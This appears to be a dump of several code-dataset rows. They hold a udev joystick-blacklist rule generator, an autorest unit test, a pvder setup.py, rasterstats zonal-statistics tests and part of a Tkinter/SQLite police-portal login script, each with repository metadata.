('09da', '8090'), # A4 Tech Co., Ltd X-718BK Oscar Optical Gaming Mouse
('09da', '9033'), # A4 Tech Co., X7 X-705K
('09da', '9066'), # A4 Tech Co., Sharkoon Fireglider Optical
('09da', '9090'), # A4 Tech Co., Ltd XL-730K / XL-750BK / XL-755BK Laser Mouse
('09da', '90c0'), # A4 Tech Co., Ltd X7 G800V keyboard
('09da', 'f012'), # A4 Tech Co., Ltd Bloody V7 mouse
('09da', 'f32a'), # A4 Tech Co., Ltd Bloody B540 keyboard
('09da', 'f613'), # A4 Tech Co., Ltd Bloody V2 mouse
('09da', 'f624'), # A4 Tech Co., Ltd Bloody B120 Keyboard
('1b1c', '1b3c'), # Corsair Harpoon RGB gaming mouse
('1d57', 'ad03'), # [T3] 2.4GHz and IR Air Mouse Remote Control
('1e7d', '2e4a'), # Roccat Tyon Mouse
('20a0', '422d'), # Winkeyless.kr Keyboards
('2516', '001f'), # Cooler Master Storm Mizar Mouse
('2516', '0028'), # Cooler Master Storm Alcor Mouse
]
def write_mode_0000_udev_rule_file(path, devices, message):
filename = os.path.basename(path)
with open(path, 'w') as f:
f.write('# /etc/udev/rules.d/' + filename + '\n' + message + '\n')
for vendor, product in devices:
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", ENV{ID_INPUT_JOYSTICK}=="?*", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", KERNEL=="js[0-9]*", MODE="0000", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
def write_rm_udev_rule_file(path, devices, message):
filename = os.path.basename(path)
with open(path, 'w') as f:
f.write('# /etc/udev/rules.d/' + filename + '\n' + message + '\n')
for vendor, product in devices:
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", ENV{ID_INPUT_JOYSTICK}=="?*", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", KERNEL=="js[0-9]*", RUN+="/bin/rm %%E{DEVNAME}", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
def main():
common_header = textwrap.dedent('''\
#
# This file is auto-generated. For more information:
# https://github.com/denilsonsa/udev-joystick-blacklist
''')
write_mode_0000_udev_rule_file('51-these-are-not-joysticks.rules', DEVICES, common_header)
write_rm_udev_rule_file('51-these-are-not-joysticks-rm.rules', DEVICES, common_header)
# See: https://github.com/denilsonsa/udev-joystick-blacklist/issues/20
devices_except_microsoft = [dev for dev in DEVICES if dev[0] != '045e']
write_mode_0000_udev_rule_file('after_kernel_4_9/51-these-are-not-joysticks.rules', devices_except_microsoft, common_header)
write_rm_udev_rule_file('after_kernel_4_9/51-these-are-not-joysticks-rm.rules', devices_except_microsoft, common_header)
if __name__ == '__main__':
main()
| 1,903 | 0 | 69 |
6bf3de2c08c19066ab234342ae66eb72ed2ff3e6 | 1,517 | py | Python | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 35 | 2018-04-03T12:15:53.000Z | 2022-03-11T14:03:34.000Z | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 652 | 2017-08-28T22:44:41.000Z | 2022-03-31T21:20:31.000Z | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 29 | 2017-08-28T20:57:01.000Z | 2022-03-11T14:03:38.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from autorest.jsonrpc.localapi import LocalAutorestAPI
| 34.477273 | 76 | 0.630191 | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from autorest.jsonrpc.localapi import LocalAutorestAPI
def test_get_bool():
api = LocalAutorestAPI()
api.values = {
'bool': True,
'boolfalse': False,
'strtrue': 'true',
'strfalse': 'boo',
'inttrue': 1,
'intfalse': 42,
'dashdash': {}
}
assert api.get_boolean_value('nothere') is None
assert api.get_boolean_value('nothere', True) is True
assert api.get_boolean_value('bool') is True
assert api.get_boolean_value('bool', False) is True
assert api.get_boolean_value('boolfalse') is False
assert api.get_boolean_value('boolfalse', True) is False
assert api.get_boolean_value('strtrue') is True
assert api.get_boolean_value('strtrue', False) is True
assert api.get_boolean_value('strfalse') is False
assert api.get_boolean_value('strfalse', True) is False
assert api.get_boolean_value('inttrue') is True
assert api.get_boolean_value('inttrue', False) is True
assert api.get_boolean_value('intfalse') is False
assert api.get_boolean_value('intfalse', True) is False
assert api.get_boolean_value('dashdash') is True
assert api.get_boolean_value('dashdash', False) is True
| 1,129 | 0 | 23 |
208b4494095e6039959b5dae0d5bb99bbacfa658 | 1,209 | py | Python | setup.py | tdcosim/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 16 | 2019-04-09T19:37:38.000Z | 2020-10-31T04:17:37.000Z | setup.py | sibyjackgrove/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 10 | 2019-07-24T16:40:33.000Z | 2021-02-04T20:31:53.000Z | setup.py | tdcosim/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 4 | 2019-09-10T20:14:42.000Z | 2020-07-25T23:50:09.000Z | import os
from setuptools import setup
# The text of the README file
f=open(os.path.join(os.path.dirname(os.path.abspath(__file__)),'README.md'))
README=f.read()
f.close()
setup(name='pvder',
version=open("pvder/_version.py").readlines()[-1].split()[-1].strip("\"'"),
packages=['pvder',],
include_package_data=True,
description='Utility for simulating PV-DER',
long_description=README,
long_description_content_type="text/markdown",
url ='https://github.com/tdcosim/SolarPV-DER-simulation-tool',
author = 'Siby Jose Plathottam',
author_email='sibyjackgrove@gmail.com',
license= 'LICENSE.txt',
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
],
install_requires=['scipy>=1.0.0','numpy>=1.15.1','matplotlib>=2.0.2'],#And any other dependencies required
extras_require={"docs": ['sphinx-rtd-theme','nbsphinx','nbsphinx-link'],
"numba":['numba>=0.53.0']}
)
| 37.78125 | 112 | 0.634409 | import os
from setuptools import setup
# The text of the README file
f=open(os.path.join(os.path.dirname(os.path.abspath(__file__)),'README.md'))
README=f.read()
f.close()
setup(name='pvder',
version=open("pvder/_version.py").readlines()[-1].split()[-1].strip("\"'"),
packages=['pvder',],
include_package_data=True,
description='Utility for simulating PV-DER',
long_description=README,
long_description_content_type="text/markdown",
url ='https://github.com/tdcosim/SolarPV-DER-simulation-tool',
author = 'Siby Jose Plathottam',
author_email='sibyjackgrove@gmail.com',
license= 'LICENSE.txt',
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
],
install_requires=['scipy>=1.0.0','numpy>=1.15.1','matplotlib>=2.0.2'],#And any other dependencies required
extras_require={"docs": ['sphinx-rtd-theme','nbsphinx','nbsphinx-link'],
"numba":['numba>=0.53.0']}
)
| 0 | 0 | 0 |
2e003daec1ca05e555a7434ce8e3784ed2e0b0ae | 11,929 | py | Python | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | 1 | 2017-10-15T15:52:14.000Z | 2017-10-15T15:52:14.000Z | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | null | null | null | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | null | null | null | # test zonal stats
import os
import pytest
from osgeo import ogr
from rasterstats import raster_stats, stats_to_csv, RasterStatsError
from rasterstats.main import VALID_STATS
from rasterstats.utils import shapely_to_ogr_type, parse_geo, get_ogr_ds, \
OGRError, feature_to_geojson, bbox_to_pixel_offsets
from shapely.geometry import shape, box
import json
DATA = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
raster = os.path.join(DATA, 'slope.tif')
### Different geometry types
# Test multigeoms
## Geo interface
import shapefile
## Categorical
## Utils
| 37.161994 | 346 | 0.672563 | # test zonal stats
import os
import pytest
from osgeo import ogr
from rasterstats import raster_stats, stats_to_csv, RasterStatsError
from rasterstats.main import VALID_STATS
from rasterstats.utils import shapely_to_ogr_type, parse_geo, get_ogr_ds, \
OGRError, feature_to_geojson, bbox_to_pixel_offsets
from shapely.geometry import shape, box
import json
DATA = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
raster = os.path.join(DATA, 'slope.tif')
def test_main():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster)
for key in ['__fid__', 'count', 'min', 'max', 'mean']:
assert stats[0].has_key(key)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_zonal_global_extent():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster)
global_stats = raster_stats(polygons, raster, global_src_extent=True)
assert stats == global_stats
def test_global_non_ogr():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = (x.shape for x in reader.shapeRecords())
with pytest.raises(RasterStatsError):
raster_stats(geoms, raster, global_src_extent=True)
def test_zonal_nodata():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, nodata_value=0)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_doesnt_exist():
nonexistent = os.path.join(DATA, 'DOESNOTEXIST.shp')
with pytest.raises(RasterStatsError):
raster_stats(nonexistent, raster)
def test_nonsense():
polygons = os.path.join(DATA, 'polygons.shp')
with pytest.raises(RasterStatsError):
raster_stats("blaghrlargh", raster)
with pytest.raises(RasterStatsError):
raster_stats(polygons, "blercherlerch")
with pytest.raises(RasterStatsError):
raster_stats(["blaghrlargh",], raster)
### Different geometry types
def test_points():
points = os.path.join(DATA, 'points.shp')
stats = raster_stats(points, raster)
# three features
assert len(stats) == 3
# three pixels
assert sum([x['count'] for x in stats]) == 3
assert round(stats[0]['mean'], 3) == 11.386
assert round(stats[1]['mean'], 3) == 35.547
def test_points_categorical():
points = os.path.join(DATA, 'points.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(points, categorical_raster, categorical=True)
# three features
assert len(stats) == 3
assert not stats[0].has_key('mean')
assert stats[0][1.0] == 1
assert stats[1][2.0] == 1
def test_lines():
lines = os.path.join(DATA, 'lines.shp')
stats = raster_stats(lines, raster)
assert len(stats) == 2
assert stats[0]['count'] == 58
assert stats[1]['count'] == 32
# Test multigeoms
def test_multipolygons():
multipolygons = os.path.join(DATA, 'multipolygons.shp')
stats = raster_stats(multipolygons, raster)
assert len(stats) == 1
assert stats[0]['count'] == 125
def test_multilines():
multilines = os.path.join(DATA, 'multilines.shp')
stats = raster_stats(multilines, raster)
assert len(stats) == 1
# can differ slightly based on platform/gdal version
assert stats[0]['count'] in [89, 90]
def test_multipoints():
multipoints = os.path.join(DATA, 'multipoints.shp')
stats = raster_stats(multipoints, raster)
assert len(stats) == 1
assert stats[0]['count'] == 3
## Geo interface
import shapefile
def test_iterable_geoms_geo():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = (x.shape for x in reader.shapeRecords())
stats = raster_stats(geoms, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_iterable_features_geo():
# Grr pyshp doesnt do feature-level geo_interface so we need to construct it
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
features = []
class FeatureThing(object):
pass
fields = reader.fields[1:]
field_names = [field[0] for field in fields]
for sr in reader.shapeRecords():
geom = sr.shape.__geo_interface__
atr = dict(zip(field_names, sr.record))
obj = FeatureThing()
obj.__geo_interface__ = dict(geometry=geom,properties=atr,type="Feature")
features.append(obj)
stats = raster_stats(features, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_single_geo():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_geolike():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape.__geo_interface__ for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_iterable_geolike():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape.__geo_interface__ for x in reader.shapeRecords()]
stats = raster_stats(geoms, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_single_wkt():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [shape(x.shape).wkt for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_wkb():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [shape(x.shape).wkb for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_jsonstr():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [json.dumps(x.shape.__geo_interface__) for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
## Categorical
def test_categorical():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, categorical=True)
assert len(stats) == 2
assert stats[0][1.0] == 75
assert stats[1].has_key(5.0)
## Utils
def test_nopoints():
with pytest.raises(TypeError):
shapely_to_ogr_type('Point')
with pytest.raises(TypeError):
shapely_to_ogr_type('MultiPoint')
raster_stats(geoms, raster, global_src_extent=True)
def test_jsonstr():
jsonstr = '{"type": "Polygon", "coordinates": [[[244697.45179524383, 1000369.2307574936], [244827.15493968062, 1000373.0455558595], [244933.9692939227, 1000353.9715640305], [244933.9692939227, 1000353.9715640305], [244930.15449555693, 1000147.9724522779], [244697.45179524383, 1000159.4168473752], [244697.45179524383, 1000369.2307574936]]]}'
assert parse_geo(jsonstr)
def test_ogr_ds_nonstring():
a = box(0,1,2,3)
with pytest.raises(OGRError):
get_ogr_ds(a)
def test_ogr_geojson():
polygons = os.path.join(DATA, 'polygons.shp')
ds = ogr.Open(polygons)
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
res = feature_to_geojson(feat)
assert res['type'] == 'Feature'
def test_ogr_geojson_nogeom():
polygons = os.path.join(DATA, 'polygons.shp')
ds = ogr.Open(polygons)
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
feat.SetGeometryDirectly(None)
res = feature_to_geojson(feat)
assert res['type'] == 'Feature'
assert res['geometry'] == None
def test_specify_stats_list():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats=['min', 'max'])
assert sorted(stats[0].keys()) == sorted(['__fid__', 'min', 'max'])
assert 'count' not in stats[0].keys()
def test_specify_all_stats():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='ALL')
assert sorted(stats[0].keys()) == sorted(VALID_STATS + ["__fid__"])
stats = raster_stats(polygons, raster, stats='*')
assert sorted(stats[0].keys()) == sorted(VALID_STATS + ["__fid__"])
def test_specify_stats_string():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='min max')
assert sorted(stats[0].keys()) == sorted(['__fid__', 'min', 'max'])
assert 'count' not in stats[0].keys()
def test_specify_stats_invalid():
polygons = os.path.join(DATA, 'polygons.shp')
with pytest.raises(RasterStatsError):
raster_stats(polygons, raster, stats='foo max')
def test_optional_stats():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='min max sum majority median std')
assert stats[0]['min'] <= stats[0]['median'] <= stats[0]['max']
def test_no_copy_properties():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, copy_properties=False) # default
assert not stats[0].has_key('id') # attr from original shp
def test_copy_properties():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, copy_properties=True)
assert stats[0].has_key('id') # attr from original shp
def test_range():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats="range min max")
for stat in stats:
assert stat['range'] == stat['max'] - stat['min']
ranges = [x['range'] for x in stats]
# without min/max specified
stats = raster_stats(polygons, raster, stats="range")
assert not stats[0].has_key('min')
assert ranges == [x['range'] for x in stats]
def test_csv():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats="*")
csv = stats_to_csv(stats)
assert csv.split()[0] == ','.join(sorted(VALID_STATS + ['__fid__']))
def test_categorical_csv():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, categorical=True)
csv = stats_to_csv(stats)
assert csv.split()[0] == "1.0,2.0,5.0,__fid__"
def test_nodata_value():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, stats="*",
categorical=True, nodata_value=1.0)
assert stats[0]['majority'] == None
assert stats[0]['count'] == 0 # no pixels; they're all null
assert stats[1]['minority'] == 2.0
assert stats[1]['count'] == 49 # used to be 50 if we allowed 1.0
assert not stats[0].has_key('1.0')
def test_partial_overlap():
polygons = os.path.join(DATA, 'polygons_partial_overlap.shp')
stats = raster_stats(polygons, raster, stats="count")
for res in stats:
# each polygon should have at least a few pixels overlap
assert res['count'] > 0
def test_no_overlap():
polygons = os.path.join(DATA, 'polygons_no_overlap.shp')
stats = raster_stats(polygons, raster, stats="count")
for res in stats:
# no polygon should have any overlap
assert res['count'] is None
def test_bbox_offbyone():
# Make sure we don't get the off-by-one error in calculating src offset
rgt = (-4418000.0, 250.0, 0.0, 4876500.0, 0.0, -250.0)
geom_bounds = [4077943.9961, -3873500.0, 4462000.0055, -3505823.7582]
so = bbox_to_pixel_offsets(rgt, geom_bounds)
rsize = (37000, 35000)
assert so[1] + so[3] == rsize[1]
| 10,401 | 0 | 918 |
6d1b5b98c7991420db6dcbac8a7dd1b5def81cfc | 10,802 | py | Python | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
from PIL import Image,ImageTk
import os
import sqlite3
import datetime
from civilian_home import civ_home
from acp_home import acp_home
from constable_home import const_home
from sys_home import system_home
connection = sqlite3.connect('NCD.db')
cursor = connection.cursor()
xtr=str(datetime.datetime.now())
cursor.execute('CREATE TABLE IF NOT EXISTS POLICE(POLICEID TEXT PRIMARY KEY CHECK(POLICEID <> ""), PASSWORD TEXT NOT NULL CHECK(PASSWORD <> ""),FNAME TEXT NOT NULL CHECK(FNAME <> ""), MNAME TEXT, LNAME TEXT NOT NULL CHECK(LNAME <> ""), PHOTO BLOB NOT NULL, LASTLOGIN TEXT, EMAILID TEXT NOT NULL CHECK(EMAILID <> ""), JURISDICTION TEXT NOT NULL CHECK(JURISDICTION <> ""), ADDRESS TEXT NOT NULL CHECK(ADDRESS <> ""), GENDER TEXT NOT NULL CHECK(GENDER <> ""), DOB TEXT NOT NULL CHECK(DOB <> ""), BATCH TEXT NOT NULL CHECK(BATCH <> ""), RANK TEXT NOT NULL CHECK(RANK <> ""), MARITALSTATUS TEXT NOT NULL)')
cursor.execute("""CREATE TABLE IF NOT EXISTS POLICE1(POLICEID TEXT, CONTACT TEXT NOT NULL, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS COMPLAINT (COMPLAINT_NO text PRIMARY KEY, PLACEOFCRIME text NOT NULL CHECK(PLACEOFCRIME <> ''), TIMEOFCRIME text, CRIMEDESCRIPTION text, CITY text, POLICESTATION text, STATUS text, VFNAME text, VMNAME text, VLNAME text, AFNAME text, AMNAME text, ALNAME text, USERID text, FOREIGN KEY(USERID) REFERENCES CIVILIAN1(USERID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS CIVILIAN1 (USERID text PRIMARY KEY CHECK(USERID <> ''), PASSWORD text NOT NULL CHECK(PASSWORD <> ''), FNAME text, MNAME text, LNAME text, DOB text, GENDER text, MARITALSTATUS text, EMAILID text NOT NULL, OCCUPATION text, ADDRESS text, LASTLOGIN text, PHOTO blob)""")
cursor.execute('CREATE TABLE IF NOT EXISTS CIVILIAN2 (USERID text , CONTACT number,FOREIGN KEY (USERID) REFERENCES CIVILIAN1(USERID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL(CRIMINALID number PRIMARY KEY, FNAME text, MNAME text, LNAME text, DOB text, BLOODGROUP text, STATUS text, PRIORITY number, GENDER text, PHOTO BLOB NOT NULL)')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE1 (CASENO number PRIMARY KEY, PENALCODETYPE text, SECTIONNUMBER number, POLICESTATION text, DESCRIPTION text NOT NULL, OPENDATE text NOT NULL, CLOSEDATE text, COMPLAINT_NO TEXT, FOREIGN KEY (COMPLAINT_NO) REFERENCES COMPLAINT(COMPLAINT_NO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL3 (CRIMINALID text, CONTACT text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE2(CASENO number, POLICEID text, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID), FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE3(CASENO number , VFNAME text, VMNAME text, VLNAME text, VAGE number, VADDRESS text, FOREIGN KEY (CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE4(CASENO number, FIRNO number, FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO), FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL2(CRIMINALID text, ADDRESS text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL1 (CRIMINALID text, IDENTIFICATIONMARKS text,FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME2 (FIRNO number, CRIMINALID number, FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO), FOREIGN KEY(CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME3 (FIRNO number, PENALCODETYPE text, SECTIONNUMBER number, FOREIGN KEY (FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute( 'CREATE TABLE IF NOT EXISTS CRIME(FIRNO number PRIMARY KEY, DAMAGEAMOUNT number, INJURED number, DEATHS number, DATEOFCRIME text NOT NULL, PLACEOFCRIME text)')
connection.commit()
t=tk.Tk()
t.title('NCDS')
t.configure(background = 'white')
#t.geometry("1500x800+30+30")
w, h = t.winfo_screenwidth(), t.winfo_screenheight()
t.geometry("%dx%d+0+0" % (w, h))
#fontStyle = tkFont.Font(family="Times New Roman", size=60)
OptionList=['Police','Civilian']
v = tk.StringVar(t)
v.set('Select User Type'.upper())
opt = tk.OptionMenu(t, v, *OptionList)
fing=tkFont.Font(family="Times New Roman", size=16)
opt.configure(relief="solid",font=tkFont.Font(family="Times New Roman", size=20))
impmsg=Label(t, text='WELCOME TO POLICE PORTAL',bg='black', fg='white',font=tkFont.Font(family="Times New Roman", size=60), borderwidth=2, relief="solid")
wanted=Label(t, text='T O P W A N T E D', fg='red',font=tkFont.Font(family="Times New Roman", size=40), borderwidth=2, relief="solid")
detail=Label(t, text='Enter Below details to Login',bg='white',fg='black',font=tkFont.Font(family="Times New Roman", size=20), borderwidth=2, relief="solid")
user=Label(t, text='USER ID ',font=fing,borderwidth=2, relief="solid")
password=Label(t, text='PASSWORD',font=fing, borderwidth=2,relief="solid")
uid=Entry(t,font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
pswd=Entry(t,show='*',font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
submit=Button(t, text='SUBMIT', command=enter,font=fing, borderwidth=2, relief="solid")
reset=Button(t, text='CLEAR', command=clear,font=fing, borderwidth=2, relief="solid")
signup=Button(t, text='REGISTER', command=register, borderwidth=2, relief="solid")
close=Button(t, text='EXIT', command=close, font=fing,borderwidth=2, relief="solid")
signup.configure(font=("Times New Roman",25,'bold'))
f=cursor.execute('SELECT PHOTO from CRIMINAL order by priority')
temp=f.fetchall()
plist=[]
if len(temp)>=6:
for i in range(6):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
else:
for i in range(len(temp)):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
for i in range (len(temp)-1,6):
plist.append('demo.jpg')
t.load1 = Image.open(plist[0])
t.load1 = t.load1.resize((200, 200), Image.ANTIALIAS)
t.photo1 = ImageTk.PhotoImage(t.load1, master=t)
t.img1 = Label(t, image=t.photo1, borderwidth=2, relief="solid")
t.img1.image = t.photo1
t.load2 = Image.open(plist[1])
t.load2 = t.load2.resize((200, 200), Image.ANTIALIAS)
t.photo2 = ImageTk.PhotoImage(t.load2, master=t)
t.img2 = Label(t, image=t.photo2, borderwidth=2, relief="solid")
t.img2.image = t.photo2
t.load3 = Image.open(plist[2])
t.load3 = t.load3.resize((200, 200), Image.ANTIALIAS)
t.photo3 = ImageTk.PhotoImage(t.load3, master=t)
t.img3 = Label(t, image=t.photo3, borderwidth=2, relief="solid")
t.img3.image = t.photo3
t.load4 = Image.open(plist[3])
t.load4 = t.load4.resize((200, 200), Image.ANTIALIAS)
t.photo4 = ImageTk.PhotoImage(t.load4, master=t)
t.img4 = Label(t, image=t.photo4, borderwidth=2, relief="solid")
t.img4.image = t.photo4
t.load5 = Image.open(plist[4])
t.load5 = t.load5.resize((200, 200), Image.ANTIALIAS)
t.photo5 = ImageTk.PhotoImage(t.load5, master=t)
t.img5 = Label(t, image=t.photo5, borderwidth=2, relief="solid")
t.img5.image = t.photo5
t.load6 = Image.open(plist[5])
t.load6 = t.load6.resize((200, 200), Image.ANTIALIAS)
t.photo6 = ImageTk.PhotoImage(t.load6, master=t)
t.img6 = Label(t, image=t.photo6, borderwidth=2, relief="solid")
t.img6.image = t.photo6
impmsg.place(x=0, y=5, width=w, height=100)
wanted.place(x=600, y=160, width=800, height=70)
detail.place(x=90 , y=200, width=410, height=75)
opt.place(x = 90, y = 300 , width=410, height=70)
user.place(x = 90, y = 380 , width=200, height=70)
uid.place(x = 300, y = 380 , width=200, height=70)
password.place(x = 90, y = 460 , width=200, height=70)
pswd.place(x = 300, y = 460 , width=200, height=70)
submit.place(x = 90, y = 540, width=200, height=70)
reset.place(x = 300, y = 540 , width=200, height=70)
signup.place(x= 90, y = 630, width = 200, height = 70)
close.place(x= 300, y = 630, width = 200, height = 70)
t.img1.place(x = 600, y = 250 , width=200, height=200)
t.img2.place(x = 900, y = 250 , width=200, height=200)
t.img3.place(x = 1200, y = 250 , width=200, height=200)
t.img4.place(x = 600, y = 500 , width=200, height=200)
t.img5.place(x = 900, y = 500 , width=200, height=200)
t.img6.place(x = 1200, y = 500 , width=200, height=200)
mainloop()
| 47.79646 | 602 | 0.669413 | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
from PIL import Image,ImageTk
import os
import sqlite3
import datetime
from civilian_home import civ_home
from acp_home import acp_home
from constable_home import const_home
from sys_home import system_home
connection = sqlite3.connect('NCD.db')
cursor = connection.cursor()
xtr=str(datetime.datetime.now())
